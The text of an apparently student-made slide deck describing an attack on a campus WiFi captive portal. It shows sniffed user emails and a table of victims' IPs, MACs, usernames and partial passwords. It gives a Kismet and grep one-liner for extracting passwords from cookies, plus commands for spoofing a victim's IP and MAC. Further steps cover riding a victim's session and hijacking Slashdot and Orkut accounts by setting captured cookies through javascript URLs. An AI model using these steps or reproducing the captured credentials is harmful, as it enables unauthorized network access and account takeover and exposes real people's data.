Date post: | 25-May-2015 |
Category: |
Technology |
Upload: | mutew |
View: | 681 times |
Download: | 9 times |
Down the rabbit-hole
a sneak peek at the SMIT-WiFi implementation
Amit SaraffAshish Shekhar
Tools Used
• Nmap – network scanner• Wireshark / Ethereal - packet analyzer• Kismet – wireless sniffer• BurpSuite – proxy (http header modifier)• Firefox – web-browser
– Live HTTP Headers– User Agent Switcher– Tamper Data– View Cookie CS– NoScript
• Unix tools – wget, curl, ssh, ifconfig etc.• Intel Centrino-based laptop running
Slackware 9
Brief Overview
• IP Range :- 172.16.183.0/22• WEP / WPA – no (yes !!)• 4 different essid's -
– SMITWiFi1– SMITWiFi2– SMITWiFi3– SMITWiFi4– different essid's / same
channel ??
Brief Overview (cont..)
• 172.16.183.1 – router / DNS resolver / authenticator
• 172.16.183.2 – 802.11b Access Point
• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)
• 172.16.183.4 – (new) Another access-point ?
Initial Monitoring
• E-mail accounts– [email protected]– [email protected]– [email protected]– [email protected]– [email protected]– [email protected]– [email protected]– [email protected]
Initial Monitoring (cont..)
• and web addresses– www.orkut.com– www.cisco.com– www.wipro.com– www.musicgamesrefer.com– www.grisoft.com– www.yahoo.com– And some more orkut !!
But that's not what we are looking for !!
Wall of Sheep
IP MAC User Password172.16.183.15 00:12:f0:db:ef:6f d205a m_-_-i172.16.183.23 00:12:f0:64:0a:67 g205a b_-_i172.16.183.78 00:13:ce:7b:d7:9b d108a 1_3172.16.183.116 00:16:ce:54:69:48 b206a j_-n172.16.183.117 00:12:f0:56:b7:3f k205a n_-_-_-w172.16.183.149 00:15:00:22:c4:0f l205a p_-_-_-_4172.16.183.155 00:13:02:43:2b:0d r305a r_-_-_a172.16.183.180 00:12:f0:51:3b:e0 j301a h_-_-_-a
** and this is just a small part of the list
How about some user account details?
So how did this happen ?
172.16.183.1 – Authentication Server
Talk about multi-platform support
User – Agent Switcher to the rescue
Background magic – how it really works
How hard is it?
• Log the network traffic using Kismet• And run - • 'strings Kismet*.dump|grep Cookie|egrep “_Pass=[a-zA-Z0-9]+;” '
• to get :Cookie: _UserName=m301a; _Pass=123;
JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
Cookie: _UserName=r703a; _Pass=manisha;JSESSIONID=2914445C961B072A73498FDCC1CEB9AE
But that isn't very ethical
• Problem – How to get access to the internet without compromising another's account ?
• Solution – Study the entire process and find a work-around.
Brief Introduction to Cookies
No not these “cookies”
So what are they ?
• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.
• Used for authenticating, tracking and maintaining specific information about users.
• We saw an example 2-3 slides back.– For those who “missed it” here it is again :
Cookie:_UserName=m301a;_Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E5
68A7293
How do they help?
• The SMIT server sets a cookie on each client it authenticates.
• Refreshes it every 180 seconds.• How do I then get this cookie ?• And how will it help even if I do
manage to capture it ?
Step 1
Find active hosts on the network:enter 'Kismet'
Step 1 (cont..)
Step 2
Select an active host and note parametersie. IP Address and MAC address.
Step 2 (cont..)
Change settings locally to match host about to be compromised.
For eg :ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4
route add default gw 172.16.183.1
Step 3
• Fire up your browser – Firefox in our case.
• Type in the following URL :
http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null
• This acts as a 'refresh' command to the server which replies back with the validated cookie.
..to get
..and we are online
Step 3 (cont..)
• What this does :– Sets you up with the “cookie”– Refreshes itself every 180 seconds– Voila, you have free internet access (until
the guy logs off / you log him off)
• Node goes offline ?– Rinse and repeat the entire process with
another IP.
Return to cookie-land
• Authentication mechanisms– We just saw an abuse of the implicit trust
mechanism guaranteed by cookies– But that was local– Can it be extended to other sites too?
Presenting Slashdot
• Popular technology portal.• News site for anything regarding
Technology / Linux / Politics / Science / YRO – Your Rights Online and more.
• Uses HTTP-POST mechanism for sending authentication data.
The main page
Login page
Cookie
Exploit -
• To authenticate as that user simply capture the incoming cookie
• Then in the address-bar type in :
javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org;
Path=/';
Result ?
So what ?
But then that is hardly any sweat !!
Moving on - orkut.com
• What is orkut ?– Social networking site.– Online community to meet new
people and keep in touch with old ones.
– Now part of the Google empire.– On in “atleast” 15 of the 20 or
so computers in the campus cyber-cafe at any time of the day.
Main page.
First observations.
• Note – The address-bar is yellow and there is a
lock-sign on the taskbar.– What it means :
• Site uses Secure-HTTP (Port 443 / https)• Certificate for validation (AES-256 bit
encryption)• Trusted certificate issuer – Thawte Consulting
cc.
– Actual login frame URL :https://www.google.com/accounts/ServiceLoginBox?
service=orkut&nui=2&uilel=1&skipvp age=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US
In other words – that information is definitely not being cracked anytime
soon.
Cookies, again?
• Cookie generated on login :
Cookies, again ? (cont..)
• 2 cookies set by the orkut domain– First one seems to be a user preference
cookie– Second one is for timezone (??)
Cookie (1)
• Question : Does Cookie 1 alone do the trick then ?
• Solution : Grab another cookie and check.
Back to kismet dumps
• Hunt for a cookie in the previous gathered logs.
strings Kismet-*dump|grep Cookie|greporkut -i
• To get :Cookie:
orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:
Set this cookie
javascript:document.cookie='
orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com;
Path=/';
To get :
Notice self-post!
Future possibilities ?
• Setup a HTTP server and masquerade as 172.16.183.1 in order to capture logins.
• Attack the hardware itself(vulnerabilities in the server / access-points).
• Ban certain clients from access (arp-flooding).
• Put the laptop in “Master” mode to route traffic through it.
Thank you ___________________
Questions ?